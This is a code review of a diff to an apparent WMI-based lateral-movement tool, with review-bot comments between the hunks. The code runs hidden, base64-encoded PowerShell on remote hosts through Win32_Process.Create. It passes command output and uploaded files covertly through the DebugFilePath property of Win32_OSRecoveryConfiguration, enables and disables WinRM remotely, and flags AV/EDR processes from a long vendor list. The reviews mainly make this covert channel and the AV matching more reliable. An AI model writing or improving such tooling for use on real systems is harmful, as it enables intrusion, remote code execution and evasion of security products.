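Review bot: The `--nops` gate in download is evaluated only after the function has printed `[+] Downloading file:` and, judging by the `originalWmiProperty` and `wsman` variables the hunk references, after the Win32_OSRecoveryConfiguration state has been read, yet the refused path still returns `true`, so the caller believes a file was written; hoist the gate to the top as a guard and return `null` as disable_winrm does. Inside the PowerShell path, `downloadPath` is spliced into a single-quoted PowerShell string in both `command1` and `encodedCommand` without escaping, so a path containing `'` breaks the script — compute `downloadPath.Replace("'", "''")` once and reuse it. The `catch { //pass }` in the byte loop means a truncated or partially written DebugFilePath silently produces a corrupt file on disk; counting skipped tokens and warning when any were dropped would make that visible. The beginning of download, where `originalWmiProperty` and `wsman` are set, lies outside the hunk.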
@@ -679,82 +912,90 @@ public object upload(Planter planter) Messenger.GoodMessage("[+] Uploading file: " + uploadFile + " to " + writePath); Messenger.GoodMessage("--------------------------------------------------------------------\n"); - List intList = new List(); - byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); - - //Convert from byte to int (bytes) - foreach (byte uploadByte in uploadFileBytes) + if (!planter.Commander.NoPS) { - int a = uploadByte; - intList.Add(a); - } + List intList = new List(); + byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); - SetOsRecovery(scope, string.Join(",", intList)); + //Convert from byte to int (bytes) + foreach (byte uploadByte in uploadFileBytes) + { + int a = uploadByte; + intList.Add(a); + } - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + SetOsRecovery(scope, string.Join(",", intList)); - if (wsman == true) - { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); + CheckForFinishedDebugFilePath(originalWmiProperty, scope); + + if (wsman == true) { - try - { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - powershell.Runspace = RunspaceCreateLocal(); - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - wsman = false; - } + try + { + if (!string.IsNullOrEmpty(planter.Password?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else + powershell.Runspace = RunspaceCreateLocal(); + } + catch (System.Management.Automation.Remoting.PSRemotingTransportException) + { + wsman = false; + } - if (powershell.Runspace.ConnectionInfo != null) 
- { - const string command1 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; - const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; - string command3 = - @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + if (powershell.Runspace.ConnectionInfo != null) + { + const string command1 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; + const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; + string command3 = + @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; + + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + } + else + wsman = false; } - else - wsman = false; } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - string encodedCommand = - "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = 
$a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string encodedCommand = + "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; + inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - // Give it a second to write - Thread.Sleep(1000); + // Give it a second to write + Thread.Sleep(1000); + } + + // Set OSRecovery back to normal pls + SetOsRecovery(scope, originalWmiProperty); + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); } - // Set OSRecovery back to normal pls - SetOsRecovery(scope, originalWmiProperty); return true; } 
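Review bot: In the WMI fallback of upload the code restores `SetOsRecovery(scope, originalWmiProperty)` after a fixed `Thread.Sleep(1000)` following `Win32_Process.Create`, but the spawned powershell.exe reads `$a.DebugFilePath` only once it has started, so on a slow target the property is reset before it is read and the remote file is written from the original DebugFilePath string, or not at all, with no error. The restore should wait until the payload has been consumed — for example have the script clear DebugFilePath after reading it and poll `GetOsRecovery` until it changes, the same idea `CheckForFinishedDebugFilePath` appears to implement earlier in this function — and `outParams["ReturnValue"]` should be checked rather than discarded. As in download, `writePath` is spliced into a single-quoted PowerShell string without escaping (`writePath.Replace("'", "''")`), and the `--nops` branch still returns `true` though nothing was uploaded. The top of upload, where `originalWmiProperty` and `wsman` are initialised, is outside the hunk.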
@@ -780,160 +1021,180 @@ public object command_exec(Planter planter) Messenger.GoodMessage("[+] Executing command: " + planter.Commander.Execute); Messenger.GoodMessage("--------------------------------------------------------\n"); - if (wsman == true) + if (!planter.Commander.NoPS) { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.System?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else + try { - powershell.Runspace = RunspaceCreateLocal(); - powershell.AddCommand(command); - Collection result = powershell.Invoke(); - foreach (PSObject a in result) + if (!string.IsNullOrEmpty(planter.System?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else { - Console.WriteLine(a); + powershell.Runspace = RunspaceCreateLocal(); + powershell.AddCommand(command); + Collection result = powershell.Invoke(); + foreach (PSObject a in result) + { + Console.WriteLine(a); + } + + return true; } - - return true; } - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) - { - wsman = false; - goto GetOut; // Do this so we're not doing below work when we don't need to - } - - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data = (" + command + " | Out-String).Trim()"; - const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); + catch (System.Management.Automation.Remoting.PSRemotingTransportException) + { + wsman = false; + goto GetOut; // Do this so we're not doing below 
work when we don't need to + } - // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time - if (noDebugCheck) + if (powershell.Runspace.ConnectionInfo != null) { - // start the timer and get a timeout - DateTime startTime = DateTime.Now; - IAsyncResult asyncPs = powershell.BeginInvoke(); + string command1 = "$data = (" + command + " | Out-String).Trim()"; + const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - while (asyncPs.IsCompleted == false) - { - //Console.WriteLine("Waiting for pipeline to finish..."); - Thread.Sleep(10000); + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); - // Check on our timeout here - TimeSpan elasped = DateTime.Now.Subtract(startTime); - if (elasped > timeout) - break; + // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time + if (noDebugCheck) + { + // start the timer and get a timeout + DateTime startTime = DateTime.Now; + IAsyncResult asyncPs = powershell.BeginInvoke(); + + while (asyncPs.IsCompleted == false) + { + //Console.WriteLine("Waiting for pipeline to finish..."); + Thread.Sleep(10000); + + // Check on our timeout here + TimeSpan elasped = DateTime.Now.Subtract(startTime); + if (elasped > timeout) + break; + } + //powershell.EndInvoke(asyncPs); } - //powershell.EndInvoke(asyncPs); + else + powershell.Invoke(); } else - powershell.Invoke(); + wsman = false; } - else - wsman = false; } - } - GetOut: - if (wsman == false) - { - if (string.IsNullOrEmpty(planter.System?.ToString())) + GetOut: + if (wsman == false) { - try + if (string.IsNullOrEmpty(planter.System?.ToString())) { - ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command) + try { - 
RedirectStandardOutput = true, - UseShellExecute = false, - CreateNoWindow = true - }; - - Process proc = new Process { StartInfo = procStartInfo }; - proc.Start(); - - // Get the output into a string - string result = proc.StandardOutput.ReadToEnd(); - // Display the command output. - Console.WriteLine(result); - } - catch (Exception e) - { - Console.WriteLine(e); - } + ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command) + { + RedirectStandardOutput = true, + UseShellExecute = false, + CreateNoWindow = true + }; - return true; - } + Process proc = new Process { StartInfo = procStartInfo }; + proc.Start(); - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + // Get the output into a string + string result = proc.StandardOutput.ReadToEnd(); + // Display the command output. 
+ Console.WriteLine(result); + } + catch (Exception e) + { + Console.WriteLine(e); + } - string encodedCommand = "$data = (" + command + - " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + return true; + } - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + // WSMAN not enabled on the remote system, use another method + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; + string encodedCommand = "$data = (" + command + + " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - if (noDebugCheck) - { - // Method Options to set a timeout - InvokeMethodOptions methodOptions = new InvokeMethodOptions(null, timeout); + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, methodOptions); - } - else - { - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; + + if (noDebugCheck) + { + // Method Options to set a timeout + InvokeMethodOptions methodOptions = new InvokeMethodOptions(null, timeout); + + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, methodOptions); + } + else + { + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + } } - } - if (!noDebugCheck) - { - // Give it a second to write and check for changes to DebugFilePath - 
Thread.Sleep(5000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + if (!noDebugCheck) + { + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(5000); + CheckForFinishedDebugFilePath(originalWmiProperty, scope); - //Get the contents of the file in the DebugFilePath prop - string[] commandOutput = GetOsRecovery(scope).Split(','); - StringBuilder output = new StringBuilder(); + //Get the contents of the file in the DebugFilePath prop + string[] commandOutput = GetOsRecovery(scope).Split(','); + StringBuilder output = new StringBuilder(); - //Print output. - foreach (string integer in commandOutput) - { - try - { - char a = (char)Convert.ToInt32(integer); - output.Append(a); - } - catch + //Print output. + foreach (string integer in commandOutput) { - //pass + try + { + char a = (char)Convert.ToInt32(integer); + output.Append(a); + } + catch + { + //pass + } } + + Console.WriteLine(output); } + else + Console.WriteLine("New process spawned, not checking for output"); - Console.WriteLine(output); + SetOsRecovery(scope, originalWmiProperty); } else - Console.WriteLine("New process spawned, not checking for output"); + { + Console.WriteLine("Shhh...Not using PS"); - SetOsRecovery(scope, originalWmiProperty); + // Create the parameters and create the new process. + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + + inParams["CommandLine"] = command; + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + + Console.WriteLine(Convert.ToUInt32(outParams["ReturnValue"]) == 0 + ? "Successfully created process" + : "Issues creating process"); + } return true; } 
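Review bot: In the new `--nops` branch at the end of the hunk, `Convert.ToUInt32(outParams["ReturnValue"])` dereferences `outParams` without the null guard the same call gets in the disable_winrm/enable_winrm hunks of this commit; use `Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 ? "Successfully created process" : "Issues creating process");`. That branch also hands `command` straight to Win32_Process.Create and never reads any output, so "Successfully created process" only says a process was spawned, the help text's "receive the output" does not hold under `--nops`, and a shell built-in that relied on the old `cmd /c` path presumably fails here — a comment above the block such as `// --nops: raw Win32_Process.Create, no cmd.exe wrapper and no output capture` would set expectations. The local `cmd /c` path still never waits for the child or reads stderr, but that is pre-existing. command_exec starts before the hunk, so `scope`, `originalWmiProperty`, `noDebugCheck` and `timeout` are not visible here.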
@@ -1026,38 +1287,52 @@ public object disable_winrm(Planter planter) { ManagementScope scope = planter.Connector.ConnectedWmiSession; - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - inParams["CommandLine"] = "powershell -w hidden -command \"Disable-PSRemoting -Force\""; + if (!planter.Commander.NoPS) + { + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + inParams["CommandLine"] = "powershell -w hidden -command \"Disable-PSRemoting -Force\""; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - - Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 - ? "Successfully disabled WinRM" - : "Issues disabling WinRM"); + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - return true; + Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 + ? 
"Successfully disabled WinRM" + : "Issues disabling WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object enable_winrm(Planter planter) { ManagementScope scope = planter.Connector.ConnectedWmiSession; - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - inParams["CommandLine"] = "powershell -w hidden -command \"Enable-PSRemoting -Force\""; + if (!planter.Commander.NoPS) + { + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + inParams["CommandLine"] = "powershell -w hidden -command \"Enable-PSRemoting -Force\""; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - - Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 - ? "Successfully enabled WinRM" - : "Issues enabling WinRM"); + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - return true; + Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 + ? "Successfully enabled WinRM" + : "Issues enabling WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object registry_mod(Planter planter) 
@@ -1632,24 +1907,56 @@ public object ps(Planter planter) ManagementObjectSearcher fileSearcher = new ManagementObjectSearcher(scope, fileQuery); ManagementObjectCollection queryCollection = fileSearcher.Get(); - Console.WriteLine("{0,-35}{1,15}", "Name", "Handle"); - Console.WriteLine("{0,-35}{1,15}", "-----------", "---------"); + Console.WriteLine("{0,-50}{1,15}", "Name", "Handle"); + Console.WriteLine("{0,-50}{1,15}", "-----------", "---------"); foreach (var o in queryCollection) { var wmiObject = (ManagementObject) o; string name = (string)wmiObject["Name"]; - if (name.Length > 30) - name = Truncate(name, 30) + "..."; + if (name.Length > 45) + name = Truncate(name, 45) + "..."; try { - Console.WriteLine("{0,-35}{1,15}", name, wmiObject["Handle"]); + if (Messenger.AVs.Any(name.ToLower().Equals)) + { + // Make AV/EDR pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Red; + Console.WriteLine("{0,-50}{1,15}", name, wmiObject["Handle"]); + Console.ResetColor(); + } + } + else if (Messenger.Admin.Any(name.ToLower().Equals)) + { + // Make admin tools pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Cyan; + Console.WriteLine("{0,-50}{1,15}", name, wmiObject["Handle"]); + Console.ResetColor(); + } + } + else + Console.WriteLine("{0,-50}{1,15}", name, wmiObject["Handle"]); } catch { //value probably doesn't exist, so just pass } } + + Messenger.BlueMessage("\nDenotes a potential admin tool"); + Messenger.ErrorMessage("Denotes a potential AV/EDR product"); + + + + + + + + return queryCollection; } diff --git a/CIMplant/Messenger.cs b/CIMplant/Messenger.cs old mode 100755 new mode 100644 index f65ce9d..a13de0a --- a/CIMplant/Messenger.cs +++ b/CIMplant/Messenger.cs @@ -1,6 +1,5 @@ using System; using System.Collections.Generic; -using System.IO; namespace CIMplant { 
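Review bot: In the new highlight branches the `Console.WriteLine` for a matched AV/EDR or admin process sits inside `if (Console.BackgroundColor == ConsoleColor.Black)` with no `else`, so on any other console background those processes are dropped from the listing entirely — the opposite of making them "pop" (compare `BlueMessage` in this same commit, which falls back to a plain `WriteLine`). The match is also case-sensitive against a lowercased name: `Messenger.AVs.Any(name.ToLower().Equals)` can never match mixed-case entries such as `"Tanium.exe"`, `"MsMpEng.exe"` or `"CylanceSvc.exe"`, and it runs after the 45-character truncation, so long names cannot match either. Compare with `StringComparison.OrdinalIgnoreCase` on the untruncated name and always print the row, colouring only when the background is black; `Messenger.Admin` is not visible in this diff, so it is assumed to have the same casing issue. ps() begins before the hunk.
```csharp
string name = (string)wmiObject["Name"];
bool isAv = Messenger.AVs.Any(av => string.Equals(av, name, StringComparison.OrdinalIgnoreCase));
bool isAdmin = !isAv && Messenger.Admin.Any(tool => string.Equals(tool, name, StringComparison.OrdinalIgnoreCase));
if (name.Length > 45)
    name = Truncate(name, 45) + "...";

try
{
    // Colour only on a black background; always print the row.
    if ((isAv || isAdmin) && Console.BackgroundColor == ConsoleColor.Black)
        Console.ForegroundColor = isAv ? ConsoleColor.Red : ConsoleColor.Cyan;
    Console.WriteLine("{0,-50}{1,15}", name, wmiObject["Handle"]);
    Console.ResetColor();
}
// … unchanged: catch, legend messages, return …
```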
@@ -32,6 +31,19 @@ public static void WarningMessage(string output) Console.WriteLine(output); } + public static void BlueMessage(string output) + { + // Make cool messages pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Cyan; + Console.WriteLine(output); + Console.ResetColor(); + } + else + Console.WriteLine(output); + } + public static void GoodMessage(string output) { // Make cool messages pop @@ -73,7 +85,7 @@ public static void GetCommands() "upload** - Upload a file to the targeted machine" } }, - {"Lateral Movement Facilitation", new string[] {"command_exec - Run a command line command and receive the output", + {"Lateral Movement Facilitation", new string[] {"command_exec** - Run a command line command and receive the output. Run with nops flag to disable PowerShell", "disable_wdigest - Sets the registry value for UseLogonCredential to zero", "enable_wdigest - Adds registry value UseLogonCredential", "disable_winrm** - Disables WinRM on the targeted system", @@ -101,7 +113,9 @@ public static void GetCommands() "logoff - Log users off the targeted machine", "reboot (or restart) - Reboot the targeted machine", "power_off (or shutdown) - Power off the targeted machine", - "vacant_system - Determine if a user is away from the system" + "vacant_system - Determine if a user is away from the system", + "edr_query - Query the local or remote system for EDR vendors" + } }, {"Log Operations", new string[] {"logon_events - Identify users that have logged onto a system"}} @@ -136,7 +150,8 @@ public static void GetCommands() } } - Console.WriteLine("\n** Denotes PowerShell usage (either using a PowerShell Runspace or Win32_Process::Create method)"); + Console.WriteLine("\n* PowerShell can be disabled by using the --nops flag"); + Console.WriteLine("** Denotes PowerShell usage (either using a PowerShell Runspace or through Win32_Process::Create method)"); } else 
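Review bot: The footnote added in the `-136` hunk, `* PowerShell can be disabled by using the --nops flag`, introduces a single-asterisk marker that no entry in the command list carries — entries are marked `**` — so the reader cannot tell which commands it applies to. The behaviour is also not uniform in this diff: command_exec degrades to a raw Win32_Process.Create with no output capture (its help line still promises "receive the output"), while disable_winrm, enable_winrm and the download-style function in the ExecuteCIM hunk refuse to run under `--nops`. Suggest folding it into the existing legend, e.g. `** Denotes PowerShell usage; with --nops, command_exec falls back to Win32_Process.Create without output and the other ** commands shown here are skipped`, and giving the command_exec entry `(no output with --nops)`. GetCommands starts before these hunks and its other branches are not visible.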
@@ -165,7 +180,8 @@ public static void GetCommands() } } - Console.WriteLine("\n** Denotes PowerShell usage (either using a PowerShell Runspace or Win32_Process::Create method)"); + Console.WriteLine("\n* PowerShell can be disabled by using the --nops flag"); + Console.WriteLine("** Denotes PowerShell usage (either using a PowerShell Runspace or Win32_Process::Create method)"); } Environment.Exit(0); @@ -215,7 +231,8 @@ public static void GetExamples() @"logoff (or logout) , -c logoff , -c logoff -s 192.168.64.4 -u test -p 1", @"reboot (or restart) , -c reboot , -c reboot -s 192.168.64.4 -u test -p 1", @"power_off (or shutdown) , -c power_off , -c shutdown -s 192.168.64.4 -u test -p 1", - @"vacant_system , -c vacant_system , -c vacant_system -s 192.168.64.4 -u test -p 1" + @"vacant_system , -c vacant_system , -c vacant_system -s 192.168.64.4 -u test -p 1", + @"edr_query , -c edr_query, -c edr_query -s 192.168.64.4 -u test -p 1" } }, {"Log Operations", new string[] { @"logon_events , -c logon_events , -c logon_events -s 192.168.64.4 -u test -p 1" }} 
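Review bot: The new example row `@"edr_query , -c edr_query, -c edr_query -s 192.168.64.4 -u test -p 1"` omits the space before the second comma that every neighbouring row has (`"vacant_system , -c vacant_system , -c ..."`); if the printing code splits on `" , "` the second and third columns of this row would merge, so it should read `@"edr_query , -c edr_query , -c edr_query -s 192.168.64.4 -u test -p 1"`. The two footnote `Console.WriteLine` lines are now duplicated verbatim in both branches of GetCommands (here and in the `-136` hunk); a single write after the if/else, or a small `PrintPowerShellLegend()` helper, would keep them from drifting. GetCommands and GetExamples both extend beyond the hunks shown.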
@@ -284,5 +301,195 @@ public static void GetExamples() Environment.Exit(0); } + // Thanks Harley! + // https://github.com/harleyQu1nn/AggressorScripts/blob/master/ProcessColor.cna + public static readonly string[] AVs = {"Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", + "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", + "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", + "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", + "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", + "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", "AvastUI.exe", "Avconsol.exe", "AvpM.exe", + "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", + "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", + "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", + "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", + "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", + "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", 
"EndPointSecurity.exe", "EngineServer.exe", + "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", + "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", "FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", + "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", + "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", + "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", + "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", + "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", "MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", + "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", + "McWCECfg.exe", "Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", + "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", + "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", + "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", + "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", 
